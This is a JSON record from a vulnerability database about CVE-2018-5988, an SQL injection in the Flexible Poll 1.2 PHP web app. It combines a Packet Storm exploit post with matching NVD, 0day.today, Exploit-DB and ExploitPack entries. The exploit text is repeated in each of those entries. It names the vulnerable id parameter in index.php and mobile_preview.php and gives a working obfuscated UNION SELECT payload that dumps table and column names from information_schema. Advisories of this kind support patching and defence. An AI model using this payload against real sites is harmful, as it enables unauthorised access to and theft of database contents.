{"id": "PACKETSTORM:146044", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Flexible Poll 1.2 SQL Injection", "description": "", "published": "2018-01-24T00:00:00", "modified": "2018-01-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/146044/Flexible-Poll-1.2-SQL-Injection.html", "reporter": "Ihsan Sencan", "references": [], "cvelist": ["CVE-2018-5988"], "lastseen": "2018-01-24T08:21:02", "viewCount": 22, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2018-01-24T08:21:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-5988"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D8E4A22ADD28040DAC5645445561DAA6"]}, {"type": "zdt", "idList": ["1337DAY-ID-29621"]}, {"type": "exploitdb", "idList": ["EDB-ID:43869"]}], "modified": "2018-01-24T08:21:02", "rev": 2}, "vulnersScore": 5.6}, "sourceHref": "https://packetstormsecurity.com/files/download/146044/flexiblepoll12-sql.txt", "sourceData": "`# # # # # \n# Exploit Title: Flexible Poll 1.2 - SQL Injection \n# Dork: N/A \n# Date: 23.01.2018 \n# Vendor Homepage: http://ddywpro.com/ \n# Software Link: https://codecanyon.net/item/flexible-poll/4363114 \n# Version: 1.2 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-5988 \n# # # # # \n# Exploit Author: Ihsan Sencan \n# Author Web: http://ihsan.net \n# Author Social: @ihsansencan \n# # # # # \n# Description: \n# The vulnerability allows an attacker to inject sql commands.... \n# \n# Proof of Concept: \n# \n# 1) \n# http://localhost/[PATH]/index.php?id=[SQL] \n# \n# 2) \n# http://localhost/[PATH]/mobile_preview.php?id=[SQL] \n# \n# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+- \n# \n# # # # # \n \n`\n", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T06:52:40", "description": "SQL Injection exists in Flexible Poll 1.2 via the id parameter to mobile_preview.php or index.php.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-24T10:29:00", "title": "CVE-2018-5988", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5988"], "modified": "2018-02-07T14:03:00", "cpe": ["cpe:/a:flexible_poll_project:flexible_poll:1.2"], "id": "CVE-2018-5988", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5988", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:flexible_poll_project:flexible_poll:1.2:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-03-19T19:19:38", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-01-24T00:00:00", "title": "Flexible Poll 1.2 - SQL Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5988"], "modified": "2018-01-24T00:00:00", "href": "https://0day.today/exploit/description/29621", "id": "1337DAY-ID-29621", "sourceData": "# # # # # \r\n# Exploit Title: Flexible Poll 1.2 - SQL Injection\r\n# Dork: N/A\r\n# Date: 23.01.2018\r\n# Vendor Homepage: http://ddywpro.com/\r\n# Software Link: https://codecanyon.net/item/flexible-poll/4363114\r\n# Version: 1.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5988\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?id=[SQL]\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/mobile_preview.php?id=[SQL]\r\n# \r\n# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+-\r\n# \r\n# # # # #\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29621"}], "exploitdb": [{"lastseen": "2018-01-24T14:29:59", "description": "Flexible Poll 1.2 - SQL Injection. CVE-2018-5988. Webapps exploit for PHP platform", "published": "2018-01-23T00:00:00", "type": "exploitdb", "title": "Flexible Poll 1.2 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5988"], "modified": "2018-01-23T00:00:00", "id": "EDB-ID:43869", "href": "https://www.exploit-db.com/exploits/43869/", "sourceData": "# # # # # \r\n# Exploit Title: Flexible Poll 1.2 - SQL Injection\r\n# Dork: N/A\r\n# Date: 23.01.2018\r\n# Vendor Homepage: http://ddywpro.com/\r\n# Software Link: https://codecanyon.net/item/flexible-poll/4363114\r\n# Version: 1.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-5988\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?id=[SQL]\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/mobile_preview.php?id=[SQL]\r\n# \r\n# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+-\r\n# \r\n# # # # #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43869/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:16", "description": "\nFlexible Poll 1.2 - SQL Injection", "edition": 1, "published": "2018-01-23T00:00:00", "title": "Flexible Poll 1.2 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-5988"], "modified": "2018-01-23T00:00:00", "id": "EXPLOITPACK:D8E4A22ADD28040DAC5645445561DAA6", "href": "", "sourceData": "# # # # # \n# Exploit Title: Flexible Poll 1.2 - SQL Injection\n# Dork: N/A\n# Date: 23.01.2018\n# Vendor Homepage: http://ddywpro.com/\n# Software Link: https://codecanyon.net/item/flexible-poll/4363114\n# Version: 1.2\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-5988\n# # # # #\n# Exploit Author: Ihsan Sencan\n# Author Web: http://ihsan.net\n# Author Social: @ihsansencan\n# # # # #\n# Description:\n# The vulnerability allows an attacker to inject sql commands....\n# \n# Proof of Concept: \n# \n# 1)\n# http://localhost/[PATH]/index.php?id=[SQL]\n# \n# 2)\n# http://localhost/[PATH]/mobile_preview.php?id=[SQL]\n# \n# -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+-\n# \n# # # # #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}